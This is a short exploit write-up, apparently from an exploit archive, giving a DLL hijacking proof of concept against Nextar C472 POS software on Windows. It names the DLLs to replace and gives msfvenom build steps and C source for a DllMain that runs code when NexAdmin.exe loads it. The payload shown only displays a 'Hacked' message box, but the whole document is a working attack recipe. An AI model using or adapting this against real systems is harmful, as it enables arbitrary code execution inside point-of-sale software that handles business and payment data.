/* 
Description: 
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.

Exploit Title: Nextar C472 POS DLL Hijacking Exploit (nxmm.dll - mdmdregistration.dll)
Date: 28/11/2021
Author: Yehia Elghaly 
Vendor: https://www.nextar.com/
Software: https://download.nextar.com/latest/setup_nex_en.exe
Version: Latest Nextar C472 POS
Tested on: Windows 7 Pro x86 - Windows 10 x64
Vulnerable extensions: .htm .html
*/

/* 
Instructions:

1. Create dll using msfvenom (sudo msfvenom  --platform windows -p windows/messagebox TEXT="Nex POS Hacked - YME" -f dll > nxmm.dll) or compile the code
2. Replace nxmm.dll - mdmdregistration.dll or shcore.dll in Nex directory C:\Nex with your newly dll
3. Launch NexAdmin.exe
4. PoP UP  MessageBox!
*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

  switch (fdwReason)
  {
    case DLL_PROCESS_ATTACH:
    dll_mll();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
  }

  return TRUE;
}

int dll_mll()
{
  MessageBox(0, "Nex POS Hacked!", "YME", MB_OK);
}